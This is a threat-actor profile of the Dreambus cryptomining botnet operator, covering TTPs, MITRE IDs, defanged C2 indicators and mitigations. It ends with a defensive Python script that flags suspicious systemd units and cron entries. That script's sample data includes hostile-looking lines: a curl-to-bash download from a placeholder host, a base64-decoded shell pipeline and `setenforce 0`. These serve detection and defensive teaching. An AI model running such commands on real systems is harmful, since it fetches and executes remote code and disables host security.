# Threat Actor: Dreambus Operator
## Attribution & Identity
- **Aliases:** Dreambus, Sandpiper.
- **Identity:** A cybercriminal group believed to be of Russian origin, or at least operating from a Russian-speaking region, primarily focused on cryptojacking and large-scale botnet operations.
- **Associations:** Associated with the "DreamBus" modular botnet/malware family.
## Activity Summary
The Dreambus operator is known for managing a sophisticated, modular botnet that targets Linux-based systems. Their historical activity is characterized by large-scale automated scanning for exposed enterprise applications. Recent operations have focused on exploiting vulnerabilities in Redis, PostgreSQL, and other database/cloud-native technologies to deploy Monero (XMR) miners.
## Tactics, Techniques & Procedures
- **Initial Access:** Exploitation of known vulnerabilities (e.g., CVE-2022-0543 in Redis) and brute-forcing weak credentials on SSH and database services.
- **Persistence:** Use of `systemd` services and `cron` jobs to ensure the malware persists through reboots.
- **Execution:** Deployment of modular ELF binaries tailored for Linux architectures.
- **Evasion:** The operator frequently uses the `upx` packer and base64-encodes or otherwise obfuscates its shell scripts. It also kills competing cryptominers and disables host security controls, for example putting SELinux into permissive mode with `setenforce 0`.
- **Lateral Movement:** Utilizing SSH keys found on compromised systems to spread further within the network.
- **MITRE ATT&CK IDs:**
  - T1190 (Exploit Public-Facing Application)
  - T1021.004 (Remote Services: SSH)
  - T1496 (Resource Hijacking)
  - T1543.002 (Create or Modify System Process: Systemd Service)
## Targeting
- **Sectors:** Cloud infrastructure, technology, and any enterprise utilizing Linux-based database servers.
- **Geography:** Global targeting; however, a high concentration of victims has historically been observed in the United States, Europe, and East Asia.
- **Victims:** Servers running Redis, PostgreSQL, MySQL, Hadoop, and Jenkins.
## Tools & Infrastructure
- **Malware:** Dreambus (modular botnet), XMRig (cryptominer).
- **Infrastructure:**
  - Uses Tor-to-web (Tor2Web) gateways for C2 communication to hide the true origin of the command servers.
  - C2 domains (defanged): `z999qwe[.]com`, `release.letsmakecloud[.]com`, `api.u789ghj[.]com`.
  - C2 IP (defanged): `103.214.5[.]208`.
## Implications
The Dreambus operator represents a persistent threat to cloud and server environments. While their primary objective is financial (cryptomining), the level of access they achieve (often root/administrative) means they could pivot to data exfiltration or ransomware deployment at any time. Their ability to rapidly weaponize newly disclosed (1-day) vulnerabilities in enterprise software makes them a high-priority threat for DevOps and IT security teams.
## Mitigations
- **Patch Management:** Prioritize patching of public-facing database services (specifically Redis and PostgreSQL).
- **Credential Hygiene:** Implement strong, unique passwords and utilize SSH keys instead of password-based authentication for Linux servers.
- **Egress Filtering:** Restrict outbound traffic from servers to only necessary ports and recognized IP ranges to disrupt C2 communication and cryptomining pools.
- **Monitoring:** Monitor for unusual CPU spikes and the creation of unauthorized `systemd` services or `cron` entries.
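The monitoring item above can be turned into a small host triage check. The following script is an added example written for this report, not tooling from the operator or from any vendor; the unit names and cron entries are constructed sample data, and the baseline set is assumed to come from a known-good image of the server.

```python
import re

# Constructed sample data standing in for `systemctl list-unit-files` output and
# /etc/cron.d contents; none of these values appear in the report.
BASELINE_UNITS = {"sshd.service", "cron.service", "redis-server.service"}
CURRENT_UNITS = {"sshd.service", "cron.service", "redis-server.service", "sys-updater.service"}
CRON_LINES = [
    "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf",
    "*/5 * * * * root echo aGVsbG8= | base64 -d | sh",
    "@reboot root setenforce 0",
    "*/10 * * * * root curl -s http://example.invalid/update | bash",
]

# Patterns for the evasion and persistence behaviours described in the TTP section:
# base64-obfuscated shell, download-and-run one-liners, SELinux disabled, miner names.
SUSPICIOUS = {
    "base64-decoded shell": re.compile(r"base64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b"),
    "download-and-execute": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"),
    "selinux disabled": re.compile(r"\bsetenforce\s+0\b"),
    "miner reference": re.compile(r"xmrig|monero", re.IGNORECASE),
}


def new_systemd_units(current, baseline):
    """Units present now but absent from the golden baseline (T1543.002)."""
    return sorted(set(current) - set(baseline))


def flag_cron_lines(lines):
    """Return (line, [reasons]) for every cron entry matching a suspicious pattern."""
    hits = []
    for line in lines:
        reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(line)]
        if reasons:
            hits.append((line, reasons))
    return hits


if __name__ == "__main__":
    for unit in new_systemd_units(CURRENT_UNITS, BASELINE_UNITS):
        print(f"[new unit] {unit}")
    for line, reasons in flag_cron_lines(CRON_LINES):
        print(f"[cron] {', '.join(reasons)}: {line}")
```

On a live host, feed `new_systemd_units` the unit names from `systemctl list-unit-files` and `flag_cron_lines` the lines of `/etc/crontab`, `/etc/cron.d/*` and each user's crontab; a hit is a lead for investigation, not proof of compromise.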